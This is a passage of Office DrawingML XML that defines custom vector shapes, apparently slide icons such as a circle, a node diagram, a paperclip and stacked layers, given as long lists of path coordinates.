                  <a:lnTo>
                    <a:pt x="283972" y="1530096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="946404" y="1147572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="946404" y="382524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283972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423148" y="5183124"/>
              <a:ext cx="746760" cy="748665"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="746759" h="748664">
                  <a:moveTo>
                    <a:pt x="373379" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="326536" y="2915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281432" y="11426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238415" y="25184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197836" y="43837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160044" y="67034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125389" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94220" y="125660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66887" y="160388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43740" y="198257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25128" y="238918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11401" y="282019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2908" y="327211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="374141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2908" y="421072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11401" y="466264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25128" y="509365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43740" y="550026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66887" y="587895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94220" y="622623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125389" y="653857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160044" y="681249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197836" y="704446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238415" y="723099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281432" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326536" y="745368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373379" y="748283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420223" y="745368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="465327" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508344" y="723099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548923" y="704446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="586715" y="681249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="621370" y="653857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="652539" y="622623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679872" y="587895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703019" y="550026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721631" y="509365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735358" y="466264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743851" y="421072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="746759" y="374141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743851" y="327211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735358" y="282019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721631" y="238918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703019" y="198257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679872" y="160388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="652539" y="125660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="621370" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="586715" y="67034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548923" y="43837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508344" y="25184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="465327" y="11426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420223" y="2915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373379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427976" y="4823523"/>
              <a:ext cx="1557655" cy="1477010"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1557654" h="1477010">
                  <a:moveTo>
                    <a:pt x="345186" y="584136"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="339636" y="560451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325755" y="540829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325018" y="539788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323977" y="539051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323977" y="584136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320205" y="604520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310311" y="617893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296430" y="625221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280670" y="627443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260311" y="625221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246976" y="617893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239699" y="604520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237490" y="584136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239699" y="568426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246976" y="554532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260311" y="544614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280670" y="540829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296430" y="544614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310311" y="554532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320205" y="568426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323977" y="584136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323977" y="539051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304355" y="525170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280670" y="519620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250659" y="525170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226758" y="539788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210947" y="560451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205232" y="584136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205232" y="605345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129667" y="648652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119684" y="641007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118745" y="640524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118745" y="702881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115074" y="718921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105371" y="732777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91516" y="742518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75438" y="746188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59740" y="742518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45885" y="732777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36017" y="718921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32258" y="702881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36017" y="687197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45885" y="673341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59740" y="663473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75438" y="659701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91516" y="663473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105371" y="673341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115074" y="687197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118745" y="702881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118745" y="640524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106743" y="634199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91694" y="629323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75438" y="627443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45427" y="633158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21513" y="648970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5702" y="672884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="702881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5715" y="732967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21526" y="756907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45427" y="772731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75438" y="778446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90068" y="776554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101511" y="771550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110744" y="764463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118745" y="756348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205232" y="810704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205232" y="821626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210947" y="845324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226758" y="865987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250659" y="880605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280670" y="886142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304355" y="880605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325018" y="865987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325755" y="864933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339636" y="845324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345186" y="821626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339636" y="791629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325018" y="767715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323977" y="766927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323977" y="821626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320205" y="837399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310311" y="851293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296430" y="861174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280670" y="864933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260311" y="861174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246976" y="851293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239699" y="837399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237490" y="821626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239699" y="801281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246976" y="787946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260311" y="780669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280670" y="778446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296430" y="780669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310311" y="787946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320205" y="801281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323977" y="821626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323977" y="766927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304355" y="751903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280670" y="746188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258533" y="748131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240449" y="754037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226352" y="764095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216154" y="778446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177660" y="756348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159956" y="746188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140716" y="735139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142316" y="727214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149390" y="710819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151003" y="702881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151003" y="691959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140716" y="681672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184581" y="659701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206654" y="648652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227203" y="638365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236804" y="646049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249555" y="652894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264490" y="657821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280670" y="659701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304355" y="653986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324751" y="638365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325018" y="638162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="331558" y="627443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339636" y="614222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345186" y="584136"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1557654" h="1477010">
                  <a:moveTo>
                    <a:pt x="942721" y="1269047"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="923671" y="1259522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="746125" y="1428432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721753" y="1444231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693191" y="1449489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="662965" y="1444231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="633603" y="1428432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617804" y="1404416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612546" y="1376807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617804" y="1349209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="633603" y="1325181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="792607" y="1165796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="813701" y="1155369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="833704" y="1151890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="851916" y="1155369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="867664" y="1165796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878014" y="1182624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="881468" y="1203109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878014" y="1223733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708660" y="1400365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665708" y="1391818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="811022" y="1221803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="792607" y="1203388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="652018" y="1344231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="641654" y="1394256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669188" y="1425740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710247" y="1425740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="886079" y="1259522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="907605" y="1199540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="902220" y="1171067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="886079" y="1147254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="862126" y="1131112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="834656" y="1125728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="807300" y="1131112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="783717" y="1147254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614553" y="1315529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595007" y="1346796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590169" y="1381620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597509" y="1416418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614553" y="1447609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="645782" y="1468894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681443" y="1476921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718769" y="1472514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="755015" y="1456499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="942721" y="1269047"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1557654" h="1477010">
                  <a:moveTo>
                    <a:pt x="958240" y="104203"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="955027" y="94919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945388" y="87185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936879" y="82486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936879" y="104330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777240" y="171513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625602" y="104330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777240" y="20510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936879" y="104330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936879" y="82486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="824865" y="20510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="793877" y="3365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787628" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780415" y="368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="771474" y="2247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760095" y="3365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="608457" y="87185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="603948" y="94919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="602449" y="104203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="603948" y="113411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="608457" y="120840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760095" y="188150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="771474" y="192938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780402" y="194538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787628" y="192938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="793877" y="188150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="831316" y="171513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945388" y="120840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="955027" y="113411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="958240" y="104203"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1557654" h="1477010">
                  <a:moveTo>
                    <a:pt x="962533" y="238823"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="954925" y="240080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="946505" y="242824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="939685" y="245579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936879" y="246824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777240" y="314134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622795" y="245579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616026" y="242824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607758" y="240080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="600456" y="238823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="600570" y="244919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760095" y="331279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780402" y="337286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787628" y="335788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="793877" y="331279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="832459" y="314134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="951699" y="261175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="957199" y="254406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="961059" y="246138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="962533" y="238823"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1557654" h="1477010">
                  <a:moveTo>
                    <a:pt x="962533" y="163004"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="954925" y="167932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="946505" y="170459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="939685" y="171386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936879" y="171513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777240" y="246824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625602" y="171513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622795" y="171386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616026" y="170459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607758" y="167932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="600456" y="163004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="600570" y="170459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="601446" y="178777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="603821" y="185420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="608457" y="188150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760095" y="263969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="793877" y="263969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828128" y="246824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945388" y="188150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="951699" y="185420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="957199" y="178777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="961059" y="170535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="962533" y="163004"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1557654" h="1477010">
                  <a:moveTo>
                    <a:pt x="1557274" y="656297"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1549527" y="623760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1542999" y="630085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1535696" y="637413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1532382" y="640791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1532382" y="674179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1530997" y="688174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1515872" y="725106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465275" y="749147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1440014" y="749719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1414780" y="741743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1280541" y="876871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1274089" y="881456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1267726" y="882980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1261478" y="881456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1255395" y="876871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1245743" y="869137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1242529" y="859790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1245743" y="850557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1255395" y="843089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1380998" y="707961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1373174" y="686473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1373949" y="661784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1382522" y="636981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1410830" y="604240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1456944" y="589978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1442859" y="610209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1438173" y="632091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1442859" y="653961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1456944" y="674179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1473631" y="683831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1494891" y="687044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1516037" y="683831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1532382" y="674179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1532382" y="640791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1515872" y="657542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1506816" y="662051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1494739" y="663549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482775" y="662051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1474089" y="657542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1464437" y="644994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1461223" y="632333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1464437" y="619683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1474089" y="607123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1481302" y="594614"/>
